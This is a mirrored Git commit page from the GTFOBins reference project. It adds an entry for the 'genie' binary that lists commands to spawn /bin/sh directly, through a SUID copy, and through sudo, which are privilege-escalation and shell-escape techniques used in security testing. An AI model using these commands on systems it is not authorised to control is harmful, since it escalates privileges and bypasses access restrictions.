1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-04-20 00:43:46 +02:00

Add genie (no need "-p" flag to preserve suid)

This commit is contained in:
Miguel R 2022-04-29 09:00:58 +02:00 committed by Andrea Cardaci
parent 58bca80e6c
commit 1bf5418f14

9
_gtfobins/genie.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
shell:
- code: genie -c '/bin/sh'
suid:
- code: ./genie -c '/bin/sh'
sudo:
- code: sudo genie -c '/bin/sh'
---